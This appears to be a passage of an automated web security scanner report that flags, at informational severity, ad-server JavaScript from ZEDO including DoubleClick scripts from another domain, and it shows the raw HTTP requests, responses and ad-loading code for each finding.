   <meta name="robots" content="index,follow"/>
   <title>Channel 9: Videos about the people buildi
...[SNIP]...
<![endif]-->
       <script src="http://ajax.aspnetcdn.com/ajax/jquery/jquery-1.4.4.min.js" type="text/javascript"></script>
   <script src="http://static.ch9.ms/scripts/globals.js?v=Ff4HKqorUMDjwiJF2XtkkfwyVQo1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
   <script src="http://static.ch9.ms/scripts/videoplayer.js?v=Ff4HKqorUMDjwiJF2XtkkfwyVQo1" type="text/javascript"></script>
   <script src="http://static.ch9.ms/scripts/videoInfobox.js?v=Ff4HKqorUMDjwiJF2XtkkfwyVQo1" type="text/javascript"></script>
   <script src="http://static.ch9.ms/scripts/jquery/jqueryUI/jquery-ui-1.8.6/jquery.ui.position.min.js?v=Ff4HKqorUMDjwiJF2XtkkfwyVQo1" type="text/javascript"></script>
   <script src="http://static.ch9.ms/scripts/tabs.js?v=Ff4HKqorUMDjwiJF2XtkkfwyVQo1" type="text/javascript"></script>
   <script src="http://static.ch9.ms/scripts/rotator.js?v=Ff4HKqorUMDjwiJF2XtkkfwyVQo1" type="text/javascript"></script>
   <script src="http://static.ch9.ms/scripts/homepage.js?v=Ff4HKqorUMDjwiJF2XtkkfwyVQo1" type="text/javascript"></script>
...[SNIP]...
</div>
   <script src="http://static.ch9.ms/scripts/jquery/jqueryUI/jquery-ui-1.8.6/core_widget.js?v=Ff4HKqorUMDjwiJF2XtkkfwyVQo1" type="text/javascript"></script>
   <script src="http://static.ch9.ms/scripts/ratings.js?v=Ff4HKqorUMDjwiJF2XtkkfwyVQo1" type="text/javascript"></script>
...[SNIP]...
<!-- Version: MS.3.0.0 -->
<script src="http://static.ch9.ms/scripts/wt.js?v=Ff4HKqorUMDjwiJF2XtkkfwyVQo1" type="text/javascript"></script>
...[SNIP]...

24.54. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.4845505202032985 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=50:55:50:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=51:50:55:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=100
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:50:14 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=51%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=51%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.55. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.9999001927744848 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=48:45:43:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1;expires=Tue, 24 May 2011 16:50:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=44:48:45:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=114
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:50:00 GMT
Connection: close
Content-Length: 2643

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
O0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>');
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5767.dogtimemedia.comOX6462/B5286815.2;abr=!ie;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=907527%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=44%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=44%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.56. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.07817547594038587 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=15:16:16:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:0,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:0,1,1:0,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:13 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=17:15:16:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=128
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:13 GMT
Connection: close
Content-Length: 2124

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3271.dogtimemedia.com/B5314413.11;sz=160x600;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=921884%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=17%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=17%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.57. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.18763553122576554 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=55:66:56:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=57:55:66:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=151
Expires: Sun, 24 Apr 2011 16:53:38 GMT
Date: Sun, 24 Apr 2011 16:51:07 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=57%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=57%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.58. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.23843470946561412 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=12:12:13:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:0,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:59 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=14:12:12:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=143
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:47:59 GMT
Connection: close
Content-Length: 2643

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
O0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>');
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5767.dogtimemedia.comOX6462/B5108358.3;abr=!ie;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=909002%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=14%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=14%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.59. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.30604341243579586 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=5:4:6:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133|2,1,1:1,1,1:1,1,1:0,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133|2,1,1:1,1,1:1,1,1:0,1,1:1,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:15 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=7:5:4:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=186
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:47:16 GMT
Connection: close
Content-Length: 2142

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.dogtimemedia.comOX6462/B5304363.10;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=911254%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=7%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=7%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D5%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.60. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.8509669981271252 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=4:2:2:None; FFCap=1574B809,210132,210841,210128|2,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732|2,1,1:1,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:06 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=3:4:2:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=195
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:47:06 GMT
Connection: close
Content-Length: 2125

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.dogtimemedia.comOX6462/B5304363.9;sz=300x250;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=911256%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=3%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=3%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D5%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.61. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.7873504462599064 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=16:14:14:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:11 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=15:16:14:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=130
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:11 GMT
Connection: close
Content-Length: 2114

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3271.dogtimemedia.com/B5314413.10;sz=300x250;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=921885%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=15%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=15%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.62. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.8632092914995171 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=20:18:17:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:2,1,1:0,1,1:1,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=18:20:18:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=119
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:22 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=18%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=18%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.63. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

